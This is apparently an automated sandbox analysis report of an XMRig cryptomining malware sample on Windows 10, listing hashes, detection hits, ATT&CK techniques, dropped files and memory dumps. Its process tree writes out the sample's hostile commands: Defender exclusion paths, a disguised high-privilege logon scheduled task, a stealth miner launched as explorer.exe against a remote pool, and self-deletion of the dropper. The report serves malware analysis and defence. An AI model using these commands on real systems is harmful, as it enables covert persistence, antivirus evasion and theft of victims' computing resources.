xmrig | 66f95a7e9e84707c6e6209272d2605aa4d9444c6bf73d180d1621e5822313cdb

Analysis

max time kernel
1s
max time network
152s
platform
windows10-2004_x64
resource
win10v2004-20231215-en
resource tags

arch:x64arch:x86image:win10v2004-20231215-enlocale:en-usos:windows10-2004-x64system
submitted
07-01-2024 04:29

Sharing

Copy URL

Twitter E-mail

Report Analysis Logs

General

Target

48079bdfd2ce51ffadd7926448035f0e.exe
Size

44KB
MD5

48079bdfd2ce51ffadd7926448035f0e
SHA1

25879d9520be8b145bb8610f514d16ac01d599f7
SHA256

66f95a7e9e84707c6e6209272d2605aa4d9444c6bf73d180d1621e5822313cdb
SHA512

e557164067b8326145e19a80e37ada2d83a755eae6409b8eb8fc948546d93296c42814f8a7f6dcc3639940858f656aa7569b2942ebd01dd3ef193a881b099074
SSDEEP

768:d5q0Hy7uQY6hG/h3kptwL6WiVn4V9FvS1sWk9CQIgnY0GF9d5TNqpSh8e:d5qqirGJ3kHxWRI/k8QIgnYjF99b8e

Score

10^/10

xmrig miner

Malware Config

Signatures

xmrig
XMRig is a high performance, open source, cross platform CPU/GPU miner.
miner xmrig

XMRig Miner payload 10 IoCs

miner

resource	yara_rule
behavioral2/memory/348-192-0x0000000140000000-0x0000000140786000-memory.dmp	xmrig
behavioral2/memory/348-194-0x0000000140000000-0x0000000140786000-memory.dmp	xmrig
behavioral2/memory/348-193-0x0000000140000000-0x0000000140786000-memory.dmp	xmrig
behavioral2/memory/348-198-0x0000000140000000-0x0000000140786000-memory.dmp	xmrig
behavioral2/memory/348-200-0x0000000140000000-0x0000000140786000-memory.dmp	xmrig
behavioral2/memory/348-201-0x0000000140000000-0x0000000140786000-memory.dmp	xmrig
behavioral2/memory/348-202-0x0000000140000000-0x0000000140786000-memory.dmp	xmrig
behavioral2/memory/348-199-0x0000000140000000-0x0000000140786000-memory.dmp	xmrig
behavioral2/memory/348-203-0x0000000140000000-0x0000000140786000-memory.dmp	xmrig
behavioral2/memory/348-204-0x0000000140000000-0x0000000140786000-memory.dmp	xmrig

Legitimate hosting services abused for malware hosting/C2 1 TTPs

Web Service
T1102

Creates scheduled task(s) 1 TTPs 2 IoCs

Schtasks is often used by malware for persistence or to perform post-infection execution.

persistence

Scheduled Task/Job

T1053

pid	Process
1064	schtasks.exe
1028	schtasks.exe

Suspicious behavior: EnumeratesProcesses 2 IoCs

pid	Process
3612	powershell.exe
3612	powershell.exe

Suspicious use of AdjustPrivilegeToken 1 IoCs

description	pid	Process
Token: SeDebugPrivilege	3612	powershell.exe

Suspicious use of WriteProcessMemory 4 IoCs

description	pid	Process	procid_target
PID 4648 wrote to memory of 1248	4648	48079bdfd2ce51ffadd7926448035f0e.exe	68
PID 4648 wrote to memory of 1248	4648	48079bdfd2ce51ffadd7926448035f0e.exe	68
PID 1248 wrote to memory of 3612	1248	cmd.exe	69
PID 1248 wrote to memory of 3612	1248	cmd.exe	69

C:\Users\Admin\AppData\Local\Temp\48079bdfd2ce51ffadd7926448035f0e.exe
"C:\Users\Admin\AppData\Local\Temp\48079bdfd2ce51ffadd7926448035f0e.exe"
1⤵
- Suspicious use of WriteProcessMemory
PID:4648
- C:\Windows\SYSTEM32\cmd.exe
  "cmd" /c powershell -Command Add-MpPreference -ExclusionPath '%UserProfile%' & powershell -Command Add-MpPreference -ExclusionPath '%AppData%' & powershell -Command Add-MpPreference -ExclusionPath '%Temp%' & powershell -Command Add-MpPreference -ExclusionPath '%SystemRoot%' & exit
  2⤵
  - Suspicious use of WriteProcessMemory
  PID:1248
- - C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
    powershell -Command Add-MpPreference -ExclusionPath 'C:\Users\Admin'
    3⤵
    - Suspicious behavior: EnumeratesProcesses
    - Suspicious use of AdjustPrivilegeToken
    PID:3612
- - C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
    powershell -Command Add-MpPreference -ExclusionPath 'C:\Users\Admin\AppData\Roaming'
    3⤵
    PID:4536
- - C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
    powershell -Command Add-MpPreference -ExclusionPath 'C:\Users\Admin\AppData\Local\Temp'
    3⤵
    PID:4680
- - C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
    powershell -Command Add-MpPreference -ExclusionPath 'C:\Windows'
    3⤵
    PID:392
- C:\Windows\System32\cmd.exe
  "C:\Windows\System32\cmd.exe" /c C:\Users\Admin\AppData\Local\Temp\svchost64.exe "C:\Users\Admin\AppData\Local\Temp\48079bdfd2ce51ffadd7926448035f0e.exe"
  2⤵
  PID:3544
- - C:\Users\Admin\AppData\Local\Temp\svchost64.exe
    C:\Users\Admin\AppData\Local\Temp\svchost64.exe "C:\Users\Admin\AppData\Local\Temp\48079bdfd2ce51ffadd7926448035f0e.exe"
    3⤵
    PID:2888
  - - C:\Windows\System32\cmd.exe
      "C:\Windows\System32\cmd.exe" /c schtasks /create /f /sc onlogon /rl highest /tn "services64" /tr '"C:\Windows\system32\services64.exe"' & exit
      4⤵
      PID:4204
    - - C:\Windows\system32\schtasks.exe
        
        schtasks /create /f /sc onlogon /rl highest /tn "services64" /tr '"C:\Windows\system32\services64.exe"'
        5⤵
        Creates scheduled task(s)
        
        PID:1064
  - - C:\Windows\system32\services64.exe
      "C:\Windows\system32\services64.exe"
      4⤵
      PID:4392
    - - C:\Windows\system32\cmd.exe
        
        "cmd" /c powershell -Command Add-MpPreference -ExclusionPath '%UserProfile%' & powershell -Command Add-MpPreference -ExclusionPath '%AppData%' & powershell -Command Add-MpPreference -ExclusionPath '%Temp%' & powershell -Command Add-MpPreference -ExclusionPath '%SystemRoot%' & exit
        5⤵
        
        PID:4348
      - C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
        
        powershell -Command Add-MpPreference -ExclusionPath 'C:\Users\Admin\AppData\Local\Temp'
        6⤵
        
        PID:4640
      - C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
        
        powershell -Command Add-MpPreference -ExclusionPath 'C:\Windows'
        6⤵
        
        PID:4480
    - - C:\Windows\System32\cmd.exe
        
        "C:\Windows\System32\cmd.exe" /c C:\Users\Admin\AppData\Local\Temp\svchost64.exe "C:\Windows\system32\services64.exe"
        5⤵
        
        PID:3412
      - C:\Users\Admin\AppData\Local\Temp\svchost64.exe
        
        C:\Users\Admin\AppData\Local\Temp\svchost64.exe "C:\Windows\system32\services64.exe"
        6⤵
        
        PID:3604
        
        C:\Windows\system32\Microsoft\Libs\sihost64.exe
        
        "C:\Windows\system32\Microsoft\Libs\sihost64.exe"
        7⤵
        
        PID:1100
        
        C:\Windows\explorer.exe
        
        C:\Windows\explorer.exe --cinit-find-x -B --algo=rx/0 --asm=auto --cpu-memory-pool=1 --randomx-mode=auto --randomx-no-rdmsr --cuda-bfactor-hint=12 --cuda-bsleep-hint=100 --url=pool.hashvault.pro:5555 --user=44Cs2fkLEkvMpVXCvpS8yUXRYiRiPDwVkUMvbsyaikGc4s3YRbeqn19YjNnKWBXBpcTw5Q83HXzesC6ceRKZQCYoEwEdpsP --pass= --cpu-max-threads-hint=30 --cinit-idle-wait=1 --cinit-idle-cpu=80 --tls --cinit-stealth
        7⤵
        
        PID:348
        
        C:\Windows\System32\cmd.exe
        
        "C:\Windows\System32\cmd.exe" /C choice /C Y /N /D Y /T 3 & Del "C:\Users\Admin\AppData\Local\Temp\svchost64.exe"
        7⤵
        
        PID:4508
  - - C:\Windows\System32\cmd.exe
      "C:\Windows\System32\cmd.exe" /C choice /C Y /N /D Y /T 3 & Del "C:\Users\Admin\AppData\Local\Temp\svchost64.exe"
      4⤵
      PID:2224

C:\Windows\system32\choice.exe
choice /C Y /N /D Y /T 3
1⤵
PID:1300

C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
powershell -Command Add-MpPreference -ExclusionPath 'C:\Users\Admin'
1⤵
PID:4140

C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
powershell -Command Add-MpPreference -ExclusionPath 'C:\Users\Admin\AppData\Roaming'
1⤵
PID:1588

C:\Windows\System32\cmd.exe
"C:\Windows\System32\cmd.exe" /c schtasks /create /f /sc onlogon /rl highest /tn "services64" /tr '"C:\Windows\system32\services64.exe"' & exit
1⤵
PID:3244
- C:\Windows\system32\schtasks.exe
  schtasks /create /f /sc onlogon /rl highest /tn "services64" /tr '"C:\Windows\system32\services64.exe"'
  2⤵
  - Creates scheduled task(s)
  PID:1028

C:\Windows\system32\choice.exe
choice /C Y /N /D Y /T 3
1⤵
PID:4844

Network

MITRE ATT&CK Enterprise v15

Reconnaissance

Resource Development

Initial Access

Execution

Scheduled Task/Job

T1053

Persistence

Scheduled Task/Job

T1053

Privilege Escalation

Scheduled Task/Job

T1053

Defense Evasion

Credential Access

Discovery

Lateral Movement

Collection

Command and Control

Web Service

T1102

Exfiltration

Impact

Replay Monitor

Loading Replay Monitor...

Downloads

C:\Users\Admin\AppData\Local\Microsoft\CLR_v4.0\UsageLogs\svchost64.exe.log

Filesize
539B

MD5
b245679121623b152bea5562c173ba11

SHA1
47cb7fc4cf67e29a87016a7308cdb8b1b4dc8e3d

SHA256
73d84fd03e38f1bbf8b2218f8a454f0879051855252fc76b63f20f46e7fd877f

SHA512
75e46843b1eafcc7dc4362630838895b7f399e57662a12bf0305a912c8e726b02e0a760b1b97a2c262b2d05fdb944b9ed81c338ad93e5eb5cb57bc651602e42c

Download Submit
C:\Users\Admin\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-NonInteractive

Filesize
944B

MD5
98baf5117c4fcec1692067d200c58ab3

SHA1
5b33a57b72141e7508b615e17fb621612cb8e390

SHA256
30bf8496e9a08f4fdfe4767abcd565f92b6da06ca1c7823a70cb7cab16262e51

SHA512
344a70bfc037d54176f12db91f05bf4295bb587a5062fd1febe6f52853571170bd8ef6042cb87b893185bbae1937cf77b679d7970f8cc1c2666b0b7c1b32987d

Download Submit
C:\Users\Admin\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-NonInteractive

Filesize
944B

MD5
4fc1ceefa94c82f73b7ee478e2920ea3

SHA1
17a031c8d10e316478d85d24ba8a8b5ebfda3149

SHA256
018553e7801fd476285775a4df59eb6a6c79774f6253d6dcbe9e4e96de3c96fb

SHA512
cd581f4b96e1eff3e1c8e75e9e67050060f9bdc92c2a4a0ca8282b4b1839fde9f7848cc262b8ef189466bdd51c0940be7392ae7f0278b2113d10ed590d11b311

Download Submit
C:\Users\Admin\AppData\Local\Temp\svchost64.exe

Filesize
37KB

MD5
0d0c610f89741affe2343074a173ffaa

SHA1
c504f369296f06f5aff3129a80068d7633dc56f7

SHA256
11cec0d9b156b1ab654315e1a1107a9e44b35b31d7909e8a8fbb8c5945aa4c27

SHA512
4dfab2bbd6e8b844877aad00e4ce6186ab0da0a42703add184dd2d1391d0330cca0da93aa82398d7344d8066287f047a3f10536aea6de8ced5d730415f6c3e62

Download Submit
C:\Windows\System32\Microsoft\Libs\sihost64.exe

Filesize
7KB

MD5
30b1b1da0627e27ec5dc9a40a877ca31

SHA1
ab3ff26194185d445eeac0dd0780e14f2dc3432a

SHA256
96800de36e8ff320c4a7ecc2f2d4bf61b7886dfa7ea450a594ccab2fb41e9399

SHA512
509af3a9c7fe4fbf61697b747999fda2d8f43f0a4b8f38b6a9a92f8869647a6760c5c937658f90388573274cb606efd64169a041fc5a86c381b87b7959ae7410

Download Submit
C:\Windows\system32\services64.exe

Filesize
44KB

MD5
48079bdfd2ce51ffadd7926448035f0e

SHA1
25879d9520be8b145bb8610f514d16ac01d599f7

SHA256
66f95a7e9e84707c6e6209272d2605aa4d9444c6bf73d180d1621e5822313cdb

SHA512
e557164067b8326145e19a80e37ada2d83a755eae6409b8eb8fc948546d93296c42814f8a7f6dcc3639940858f656aa7569b2942ebd01dd3ef193a881b099074

Download Submit
memory/348-192-0x0000000140000000-0x0000000140786000-memory.dmp

Filesize
7.5MB

Download
memory/348-195-0x0000000001FF0000-0x0000000002010000-memory.dmp

Filesize
128KB

Download
memory/348-202-0x0000000140000000-0x0000000140786000-memory.dmp

Filesize
7.5MB

Download
memory/348-201-0x0000000140000000-0x0000000140786000-memory.dmp

Filesize
7.5MB

Download
memory/348-200-0x0000000140000000-0x0000000140786000-memory.dmp

Filesize
7.5MB

Download
memory/348-198-0x0000000140000000-0x0000000140786000-memory.dmp

Filesize
7.5MB

Download
memory/348-193-0x0000000140000000-0x0000000140786000-memory.dmp

Filesize
7.5MB

Download
memory/348-204-0x0000000140000000-0x0000000140786000-memory.dmp

Filesize
7.5MB

Download
memory/348-194-0x0000000140000000-0x0000000140786000-memory.dmp

Filesize
7.5MB

Download
memory/348-203-0x0000000140000000-0x0000000140786000-memory.dmp

Filesize
7.5MB

Download
memory/348-206-0x0000000140000000-0x0000000140786000-memory.dmp

Filesize
7.5MB

Download
memory/348-209-0x0000000140000000-0x0000000140786000-memory.dmp

Filesize
7.5MB

Download
memory/348-208-0x0000000140000000-0x0000000140786000-memory.dmp

Filesize
7.5MB

Download
memory/348-199-0x0000000140000000-0x0000000140786000-memory.dmp

Filesize
7.5MB

Download
memory/348-207-0x0000000140000000-0x0000000140786000-memory.dmp

Filesize
7.5MB

Download
memory/392-64-0x00007FFDA4BF0000-0x00007FFDA56B1000-memory.dmp

Filesize
10.8MB

Download
memory/392-65-0x00000288ED420000-0x00000288ED430000-memory.dmp

Filesize
64KB

Download
memory/392-68-0x00000288ED420000-0x00000288ED430000-memory.dmp

Filesize
64KB

Download
memory/392-70-0x00007FFDA4BF0000-0x00007FFDA56B1000-memory.dmp

Filesize
10.8MB

Download
memory/392-66-0x00000288ED420000-0x00000288ED430000-memory.dmp

Filesize
64KB

Download
memory/392-67-0x00000288ED420000-0x00000288ED430000-memory.dmp

Filesize
64KB

Download
memory/1100-185-0x0000000000500000-0x0000000000506000-memory.dmp

Filesize
24KB

Download
memory/1100-187-0x000000001C140000-0x000000001C150000-memory.dmp

Filesize
64KB

Download
memory/1100-186-0x00007FFDA4BC0000-0x00007FFDA5681000-memory.dmp

Filesize
10.8MB

Download
memory/1100-189-0x00007FFDA4BC0000-0x00007FFDA5681000-memory.dmp

Filesize
10.8MB

Download
memory/1588-122-0x00007FFDA4E10000-0x00007FFDA58D1000-memory.dmp

Filesize
10.8MB

Download
memory/1588-128-0x00007FFDA4E10000-0x00007FFDA58D1000-memory.dmp

Filesize
10.8MB

Download
memory/1588-123-0x000001AD9EAE0000-0x000001AD9EAF0000-memory.dmp

Filesize
64KB

Download
memory/1588-125-0x000001AD9EAE0000-0x000001AD9EAF0000-memory.dmp

Filesize
64KB

Download
memory/1588-124-0x000001AD9EAE0000-0x000001AD9EAF0000-memory.dmp

Filesize
64KB

Download
memory/1588-126-0x000001AD9EAE0000-0x000001AD9EAF0000-memory.dmp

Filesize
64KB

Download
memory/2888-94-0x00007FFDA4E10000-0x00007FFDA58D1000-memory.dmp

Filesize
10.8MB

Download
memory/2888-78-0x00007FFDA4E10000-0x00007FFDA58D1000-memory.dmp

Filesize
10.8MB

Download
memory/2888-77-0x0000000000E90000-0x0000000000E9E000-memory.dmp

Filesize
56KB

Download
memory/2888-80-0x00000000039B0000-0x00000000039C0000-memory.dmp

Filesize
64KB

Download
memory/2888-79-0x0000000001790000-0x00000000017A2000-memory.dmp

Filesize
72KB

Download
memory/3604-188-0x00007FFDA4BC0000-0x00007FFDA5681000-memory.dmp

Filesize
10.8MB

Download
memory/3604-169-0x00007FFDA4BC0000-0x00007FFDA5681000-memory.dmp

Filesize
10.8MB

Download
memory/3604-170-0x000000001CC60000-0x000000001CC70000-memory.dmp

Filesize
64KB

Download
memory/3612-19-0x00007FFDA4BF0000-0x00007FFDA56B1000-memory.dmp

Filesize
10.8MB

Download
memory/3612-15-0x000001DC324D0000-0x000001DC324E0000-memory.dmp

Filesize
64KB

Download
memory/3612-13-0x00007FFDA4BF0000-0x00007FFDA56B1000-memory.dmp

Filesize
10.8MB

Download
memory/3612-14-0x000001DC324D0000-0x000001DC324E0000-memory.dmp

Filesize
64KB

Download
memory/3612-12-0x000001DC4E420000-0x000001DC4E442000-memory.dmp

Filesize
136KB

Download
memory/3612-16-0x000001DC324D0000-0x000001DC324E0000-memory.dmp

Filesize
64KB

Download
memory/4140-111-0x00007FFDA4E10000-0x00007FFDA58D1000-memory.dmp

Filesize
10.8MB

Download
memory/4140-107-0x000001767D020000-0x000001767D030000-memory.dmp

Filesize
64KB

Download
memory/4140-108-0x000001767D020000-0x000001767D030000-memory.dmp

Filesize
64KB

Download
memory/4140-109-0x000001767D020000-0x000001767D030000-memory.dmp

Filesize
64KB

Download
memory/4140-106-0x00007FFDA4E10000-0x00007FFDA58D1000-memory.dmp

Filesize
10.8MB

Download
memory/4392-164-0x00007FFDA4E10000-0x00007FFDA58D1000-memory.dmp

Filesize
10.8MB

Download
memory/4392-93-0x00007FFDA4E10000-0x00007FFDA58D1000-memory.dmp

Filesize
10.8MB

Download
memory/4392-143-0x00007FFDA4E10000-0x00007FFDA58D1000-memory.dmp

Filesize
10.8MB

Download
memory/4392-95-0x0000000001010000-0x0000000001020000-memory.dmp

Filesize
64KB

Download
memory/4480-158-0x0000025843010000-0x0000025843020000-memory.dmp

Filesize
64KB

Download
memory/4480-159-0x0000025843010000-0x0000025843020000-memory.dmp

Filesize
64KB

Download
memory/4480-157-0x0000025843010000-0x0000025843020000-memory.dmp

Filesize
64KB

Download
memory/4480-156-0x00007FFDA4E10000-0x00007FFDA58D1000-memory.dmp

Filesize
10.8MB

Download
memory/4480-161-0x00007FFDA4E10000-0x00007FFDA58D1000-memory.dmp

Filesize
10.8MB

Download
memory/4536-36-0x00007FFDA4BF0000-0x00007FFDA56B1000-memory.dmp

Filesize
10.8MB

Download
memory/4536-31-0x00007FFDA4BF0000-0x00007FFDA56B1000-memory.dmp

Filesize
10.8MB

Download
memory/4536-33-0x0000023578150000-0x0000023578160000-memory.dmp

Filesize
64KB

Download
memory/4536-34-0x0000023578150000-0x0000023578160000-memory.dmp

Filesize
64KB

Download
memory/4536-32-0x0000023578150000-0x0000023578160000-memory.dmp

Filesize
64KB

Download
memory/4640-145-0x00007FFDA4E10000-0x00007FFDA58D1000-memory.dmp

Filesize
10.8MB

Download
memory/4640-141-0x0000020BAA540000-0x0000020BAA550000-memory.dmp

Filesize
64KB

Download
memory/4640-134-0x00007FFDA4E10000-0x00007FFDA58D1000-memory.dmp

Filesize
10.8MB

Download
memory/4640-142-0x0000020BAA540000-0x0000020BAA550000-memory.dmp

Filesize
64KB

Download
memory/4640-136-0x0000020BAA540000-0x0000020BAA550000-memory.dmp

Filesize
64KB

Download
memory/4648-49-0x00007FFDA4BF0000-0x00007FFDA56B1000-memory.dmp

Filesize
10.8MB

Download
memory/4648-73-0x00007FFDA4BF0000-0x00007FFDA56B1000-memory.dmp

Filesize
10.8MB

Download
memory/4648-0-0x0000000000B80000-0x0000000000B90000-memory.dmp

Filesize
64KB

Download
memory/4648-2-0x000000001C7C0000-0x000000001C7D0000-memory.dmp

Filesize
64KB

Download
memory/4648-1-0x00007FFDA4BF0000-0x00007FFDA56B1000-memory.dmp

Filesize
10.8MB

Download
memory/4680-47-0x0000024ADEE20000-0x0000024ADEE30000-memory.dmp

Filesize
64KB

Download
memory/4680-53-0x00007FFDA4BF0000-0x00007FFDA56B1000-memory.dmp

Filesize
10.8MB

Download
memory/4680-51-0x0000024ADEE20000-0x0000024ADEE30000-memory.dmp

Filesize
64KB

Download
memory/4680-46-0x00007FFDA4BF0000-0x00007FFDA56B1000-memory.dmp

Filesize
10.8MB

Download
memory/4680-50-0x0000024ADEE20000-0x0000024ADEE30000-memory.dmp

Filesize
64KB

Download